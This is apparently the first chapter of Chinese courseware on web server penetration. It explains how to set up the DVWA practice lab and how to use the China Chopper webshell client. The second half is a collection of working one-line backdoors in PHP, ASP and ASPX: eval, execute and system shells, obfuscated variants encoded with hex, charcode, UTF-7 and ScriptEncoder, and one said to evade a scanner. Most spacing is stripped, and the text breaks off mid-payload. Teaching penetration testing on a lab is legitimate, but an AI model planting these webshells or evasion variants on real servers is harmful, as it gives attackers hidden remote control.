《Web服務(wù)器滲透實(shí)戰(zhàn)》課件第1章

第一章滲透必備基礎(chǔ)技術(shù)第一節(jié)搭建DVWA滲透測(cè)試平臺(tái)第二節(jié)一句話(huà)后門(mén)利用及操作

第一節(jié)搭建DVWA滲透測(cè)試平臺(tái)

1.1.1Windows下搭建DVWA滲透測(cè)試平臺(tái)1.準(zhǔn)備工作1)下載DVWA2)下載phpstudy2.安裝軟件(1)安裝phpstudy。(2)將DVWA解壓縮后的文件復(fù)制到phpstudy安裝時(shí)指定的WWW文件夾下。(3)設(shè)置php.ini參數(shù)。運(yùn)行phpstudy后，根據(jù)操作系統(tǒng)平臺(tái)來(lái)選擇不同的架構(gòu)，如圖1-1所示，安裝完成后到程序安裝目錄下找到php.ini文件，將參數(shù)由“allow_url_include?=?Off”修改為“allow_url_include=On”，這樣方便測(cè)試本地文件包含漏洞，保存后重啟Apache服務(wù)器。(4)修改DVWA數(shù)據(jù)庫(kù)配置文件。將“C:\phpstudy\WWW\dvwa\config\config.inc.php.dist”文件重命名為“config.inc.php”文件，修改其中的數(shù)據(jù)庫(kù)配置為實(shí)際對(duì)應(yīng)的值，在本例中MySQL數(shù)據(jù)庫(kù)root密碼為root，因此修改值如下：$_DVWA['db_server']='';$_DVWA['db_database']='dvwa';$_DVWA['db_user']='root';$_DVWA['db_password']='root';3.安裝數(shù)據(jù)庫(kù)并測(cè)試在運(yùn)行中輸入“cmd”→“ipconfig”命令獲取本機(jī)IP地址，本例中使用地址http://30/dvwa/setup.php。安裝DVWA，也可以使用localhost/dvwa/setup.php安裝，如圖1-2所示，根據(jù)提示操作即可完成安裝。安裝成功后，系統(tǒng)會(huì)自動(dòng)跳轉(zhuǎn)到30/dvwa/login.php登錄頁(yè)面，默認(rèn)登錄賬號(hào)和密碼為admin/password。登錄系統(tǒng)后，需要設(shè)置“DVWASecurity”安全等級(jí)，然后進(jìn)行漏洞測(cè)試，如圖1-3所示。最后選擇對(duì)應(yīng)級(jí)別分別為1、2、3、4提交后即可。1.1.2在Kali2016上安裝DVWA滲透測(cè)試平臺(tái)最新版的Kali(2017.2)安裝DVWA有一些問(wèn)題，其默認(rèn)php版本為php7.0，對(duì)DVWA環(huán)境不太匹配，但與Kali2016可以比較完美地結(jié)合。下面介紹如何使用Kali2016版本進(jìn)行DVWA的安裝。1.下載KaliLinux2.0如果有時(shí)間可以自己先安裝虛擬機(jī)，然后再安裝KaliLinux2.0系統(tǒng)，對(duì)于這個(gè)過(guò)程已經(jīng)很熟練的用戶(hù)，現(xiàn)成可用的虛擬機(jī)絕對(duì)是一個(gè)不錯(cuò)的選擇。KaliLinux2.0目前在其官方網(wǎng)站上已經(jīng)不能下載了，但可以通過(guò)btdig網(wǎng)站搜索來(lái)進(jìn)行下載.2.下載DVWA最新版本3.平臺(tái)搭建(1)?apache2停止服務(wù)：serviceapache2stop(2)賦予dvwa文件夾相應(yīng)的權(quán)限：chmod-R755/var/www/html/dvwa(3)開(kāi)啟MySQL：servicemysqlstartmysql-urootusemysqlcreatedatabasedvwa；exit在Kali中創(chuàng)建DVWA數(shù)據(jù)庫(kù)，如圖1-4所示。(4)配置php-gd模塊支持：apt-getinstallphp7.0-gd(5)修改php.ini參數(shù)值allow_url_include。編輯?/etc/php/7.0/apache2/php.ini文件，修改812行“allow_url_include=Off”為“allow_url_include=On”，保存后退出。Vim編輯技巧：在鍵盤(pán)上使用Esc功能鍵后，輸入“:”，然后輸入“wq!”保存修改并退出Vim。(6)配置DVWA。打開(kāi)終端，輸入以下命令，進(jìn)入到dvwa文件夾，配置uploads文件夾和phpids_log.txt可讀可寫(xiě)可執(zhí)行權(quán)限。cd/var/www/html/dvwachown-R777www-data:www-data/var/www/html/dvwa/hackable/uploadschownwww-data:www-datachown-R777/var/www/html/dvwa/external/phpids/0.6/lib/IDS/tmp/phpids_log.txt(7)生成配置文件config.inc.php：cp/var/www/html/dvwa/config/config.inc.php.dist/var/www/html/dvwa/config/config.inc.phpvim/var/www/html/dvwa/config/config.inc.php修改第18行中“db_password='p@ssw0rd'”為實(shí)際的密碼值，在本例中設(shè)置為空，如圖1-5所示。4.訪(fǎng)問(wèn)并創(chuàng)建DVWA平臺(tái)打開(kāi)瀏覽器輸入32/dvwa/setup.php。如圖1-6所示，除了Google的驗(yàn)證碼是Missing外，其他均為Enabled。單擊創(chuàng)建(Create/ResetDatabase)，即可完成所有的配置。1.1.3在Kali2017上安裝DVWA滲透測(cè)試平臺(tái)最新版的Kali安裝DVWA有一些問(wèn)題，研究發(fā)現(xiàn)，KaliLinux最新版本也可以使用DVWA，其前面出現(xiàn)無(wú)法使用是由于MySQL授權(quán)問(wèn)題，按照本節(jié)介紹的方法即可解決。1.安裝之前的準(zhǔn)備工作(1)下載KaliLinux最新版本。(2)下載DVWA最新版本。2.重新配置和安裝php-gd(1)安裝php-gd庫(kù)：aptinstallphp-gd(2)查看php版本。php-v執(zhí)行后顯示結(jié)果如下：PHP7.0.22-3(cli)(built:Aug23201705:51:41)(NTS)Copyright(c)1997-2017ThePHPGroupZendEnginev3.0.0,Copyright(c)1998-2017ZendTechnologieswithZendOPcachev7.0.22-3,Copyright(c)1999-2017,byZendTechnologies(3)下載并將DVWA復(fù)制到網(wǎng)站目錄：gitclone/ethicalhack3r/DVWA.gitmvDVWA/var/www/html/dvwa(4)修改/etc/php/7.0/apache2/php.ini文件，設(shè)置allow_url_include=On，初始設(shè)置其值為Off。賦予dvwa文件夾相應(yīng)的權(quán)限，接著在終端中輸入：chmod-R755/var/www/html/dvwachmod-R777/var/www/html/dvwa/external/phpids/0.6/lib/IDS/tmp/phpids_log.txtchmod-R777/var/www/html/dvwa/hackable/uploads(5)更改數(shù)據(jù)庫(kù)密碼和授權(quán)。登錄MySQL數(shù)據(jù)庫(kù)后執(zhí)行命令：updateusersetpassword=password('12345678')whereuser='root'andhost='localhost';grantallprivilegeson*.*toroot@localhostidentifiedby'12345678';(6)修改數(shù)據(jù)庫(kù)配置文件密碼。cd/var/www/html/dvwa/configcpconfig.inc.php.distconfig.inc.php修改config.inc.php中的數(shù)據(jù)庫(kù)配置為實(shí)際配置即可。(7)啟動(dòng)Apache2以及MySQL服務(wù)：serviceapache2restartservicemysqlrestart(8)通過(guò)瀏覽器對(duì)訪(fǎng)問(wèn)DVWA網(wǎng)站并進(jìn)行相應(yīng)設(shè)置。

第二節(jié)一句話(huà)后門(mén)利用及操作

1.2.1中國(guó)菜刀使用及管理1.執(zhí)行中國(guó)菜刀中國(guó)菜刀的英文名為“Chopper”，可以到官方網(wǎng)站進(jìn)行下載，解壓縮后直接運(yùn)行chopper.exe即可，如圖1-7所示。2.添加Webshell在中國(guó)菜刀中單擊右鍵，在彈出的菜單中選擇“添加”命令，即可添加Webshell地址，如圖1-8所示。在地址中輸入一句話(huà)木馬Webshell地址，地址后面是一句話(huà)木馬的連接密碼，在配置中選擇腳本類(lèi)型，程序會(huì)自動(dòng)識(shí)別腳本類(lèi)型，最后單擊“添加”按鈕即可添加一個(gè)Webshell地址。對(duì)于存在文件解析漏洞的網(wǎng)站W(wǎng)ebshell地址，需要手動(dòng)設(shè)置腳本類(lèi)型，例如1.asp;1.html等格式文件，可以確定腳本是ASP語(yǔ)言，其他語(yǔ)言類(lèi)似。3.連接一句話(huà)后門(mén)回到中國(guó)菜刀主界面，雙擊剛才添加的Webshell地址，即可連接一句話(huà)后門(mén)，如圖1-9所示。如果后門(mén)執(zhí)行成功，則會(huì)顯示該網(wǎng)站的目錄結(jié)構(gòu)和詳細(xì)文件等信息。4.執(zhí)行文件操作通過(guò)中國(guó)菜刀客戶(hù)端可以方便地對(duì)文件及文件夾等進(jìn)行操作，如上傳文件、下載文件、編輯、刪除、復(fù)制、重命名、修改文件(夾)時(shí)間、新建和Access管理等，如圖1-10所示。在中國(guó)菜刀中還可以對(duì)數(shù)據(jù)庫(kù)進(jìn)行管理，通過(guò)配置數(shù)據(jù)庫(kù)用戶(hù)名和用戶(hù)密碼等參數(shù)即可對(duì)數(shù)據(jù)庫(kù)進(jìn)行相應(yīng)操作。1.2.2有關(guān)一句話(huà)后門(mén)的收集與整理1．php非一句話(huà)經(jīng)典后門(mén)php運(yùn)行時(shí)如果遇見(jiàn)字符“?`?”(鍵盤(pán)上?~?符號(hào)的下?lián)蹑I)總會(huì)嘗試著執(zhí)行“`”里面包含的命令，并返回命令執(zhí)行的結(jié)果(string類(lèi)型)。其局限性在于特征碼比較明顯，“`”符號(hào)在php中很少用到，殺毒軟件很容易以此為特征碼掃描到并發(fā)出警報(bào)，而且“``”里面不能執(zhí)行php代碼。將以下代碼保存為test.php：<?phpecho`$_REQUEST[id]`;?>執(zhí)行代碼test.php?id=dirc:/，即可查看C盤(pán)文件，id后的參數(shù)可以直接執(zhí)行命令。2．加密的asp一句話(huà)后門(mén)將以下代碼保存為asp文件，或者將以下代碼插入到asp文件中，然后通過(guò)“黑狐專(zhuān)用一句話(huà)木馬加強(qiáng)版”進(jìn)行連接，其密碼為“#”，執(zhí)行效果如圖1-11所示。<scriptlanguage=vbsrunat=server>Execute(HextoStr("65786563757465287265717565737428636872283335292929"))FunctionHextoStr(data)HextoStr="EXECUTE"""""C="&CHR(&H"N=")"DoWhileLen(data)>1IfIsNumeric(Left(data,1))ThenHextoStr=HextoStr&C&Left(data,2)&Ndata=Mid(data,3)ElseHextoStr=HextoStr&C&Left(data,4)&Ndata=Mid(data,5)EndIfLoopEndFunction</script><SCRIPTRUNAT=SERVERLANGUAGE=JAVASCRIPT>eval(String.fromCharCode(116,114,121,123,101,118,97,108,40,82,101,113,117,101,115,116,46,102,111,114,109,40,39,35,39,41,43,39,39,41,125,99,97,116,99,104,40,101,41,123,125))</SCRIPt>3．新型ASP一句話(huà)后門(mén)<%Seto=Server.CreateObject("ScriptControl")o.language="vbscript"o.addcode(Request("cmd"))%>4．常見(jiàn)的asp一句話(huà)后門(mén)收集asp一句話(huà)木馬：<%%25Execute(request("a"))%%25><%Execute(request("a"))%>%><%executerequest("a")%><%<scriptlanguage=VBScriptrunat=server>executerequest("a")</script><%25Execute(request("a"))%25>%><%executerequest("yy")%><%executerequest(char(97))%><%evalrequest(char(97))%>":executerequest("value"):a="<scriptlanguage=VBScriptrunat=server>ifrequest(chr(35))<>""""thenExecuteGlobalrequest(chr(35))</script>在access數(shù)據(jù)庫(kù)中插入的一句話(huà)木馬：┼攠數(shù)畣整爠煥敵瑳∨∣┩愾┼癥污爠煥敵瑳∨≡┩>密碼為:autf-7的馬：<%@codepage=65000%><%response.Charset="936"%><%e+j-x+j-e+j-c+j-u+j-t+j-e+j-(+j-r+j-e+j-q+j-u+j-e+j-s+j-t+j-(+j-+ACI-#+ACI)+j-)+j-%>ScriptEncoder加密：<%@LANGUAGE=VBScript.Encode%><%#@~^PgAAAA==r6P.;!+/D`14Dv&X#*@!@*ErPPD4+P2Xn^ED+VVG4Cs,Dn;!n/D`^4M`&Xb?*?oBMAAA==^#~@%>可以躲過(guò)雷客圖的一句話(huà)：<%setms=server.CreateObject("MSScriptControl.ScriptControl.1")ms.Language="VBScript"ms.AddObject"Response",Responsems.AddObject"request",requestms.ExecuteStatement("ev"&"al(request(""1""))")%>php一句話(huà)：<?phpeval($_POST[cmd]);?><?php@eval($_POST[cmd]);?><?phpsystem($_REQUEST['cmd']);?><?phpeval($_POST[1]);?>aspx一句話(huà)：<scriptlanguage="C#"runat="server">WebAdmi